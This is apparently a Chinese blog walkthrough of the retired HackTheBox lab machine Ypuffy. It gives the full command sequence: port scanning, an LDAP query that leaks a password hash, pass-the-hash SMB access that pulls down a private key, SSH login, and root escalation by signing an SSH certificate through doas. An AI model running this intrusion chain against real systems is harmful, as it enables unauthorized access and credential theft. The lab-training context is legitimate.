zoukankan      html  css  js  c++  java
  • HTB-靶机-Ypuffy

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.107

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.107 -o ./Ypuffy-autorecon

    也可以使用官方的方法进行快速的扫描

    sudo masscan -p1-65535,U:1-65535 10.10.10.107 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
    ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '
    ' ',' | sed 's/,$//')
    sudo nmap -Pn -sV -sC -p$ports 10.10.10.107

    根据扫描的结果尝试了80端口访问, 显示连接被重置,发现smb服务,尝试使用匿名访问,显示权限被拒绝,看到开放389端口,开放了ldap服务,并查到相关信息,使用ldap的知识查询了一些信息,最终得到如下重要信息,ldap相关知识点可以网上搜索,重点理解其架构作用和常见的ldapsearch命令的使用

    ldapsearch -h 10.10.10.107 -x -b "dc=hackthebox,dc=htb"

    得到上述信息之后 使用smb的密码hash进行登录,这里使用smbcliet命令通过hash登录共享是最直观的,文章最后我会给出参考博客链接,这里我就是smbmap

    生成加密算法
    echo $(python -c "print str(0)*32"):0B186E661BBDBDCF6047784DE8B9FD8B
    
    smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107
    
    读取共享信息
    smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -s alice -R -H 10.10.10.107
    
    下面共享文件
    smbmap -H 10.10.10.107 -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' --download alice/my_private_key.ppk

    进入共享时候发现一个私钥文件,检查发现是通过putty类工具进行生成的,可以在kali中安装对应工具进行转换成openssh的格式文件进行远程登录目标靶机

    得到上述的一个私钥文件,不过是putty的格式,需要转换为openssh格式
    kali下安装putty工具
    apt-get install putty-tools
    
    puttygen /home/kali/Downloads/htb/ypuffy/10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice_rsa
    
    转换成功之后就可以通过私钥登录了
    ssh -i alice_rsa 10.10.10.107 -l alice1978

    成功登录到目标靶机,查看到家目录如下信息

     此时回想前面开放的80端口访问不了,通过遍历目标系统相关服务及文件,发现如下信息:

    再看看日志是不是在默认目录下

    根据日志的访问信息,发现请求的参数是keys,此时刚好我们上面查看到sql文件, 里面创建的两个表名,其中含有另一个表名principals,我们可以尝试更改keys进行访问

    得到密码信息 3m3rgencyB4ckd00r ,根据上面ssh的配置,可以根据目标靶机上的ca证书进行签发生成的ssh私钥和公钥

    cd /tmp/
    ssh-keygen -f root
    doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root root

    签发成功之后,就可以直接使用刚才生成的root私钥直接登录目标靶机了,这里需要注意生成私钥和公钥的时候在/tmp目录下操作, 这样生成的权限才能使用ca签发,下面是直接登录到目标靶机

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    Visual C++ 11 中新的并发功能
    Windows Azure Achievements for Visual Studio 发布
    视频:Pariveda解决方案帮助客户使用Windows Azure拓展商机
    ISV博客系列:本帖出自Fielding系统的创始人兼首席执行官
    2012新版微软一站式示例代码浏览器正式发布 包含Windows Azure代码示例!
    现实世界的Windows Azure:采访Soluto的创始人Tomer Dvir
    Hello China操作系统运行截图(完整版)
    ISV客户博客系列:Persistent Systems 使用Windows Azure交付基于Java的CloudNinja项目
    行业操作系统示例汽车操作系统
    上海的主要商务区域
  • 原文地址:https://www.cnblogs.com/autopwn/p/14601275.html
Copyright © 2011-2022 走看看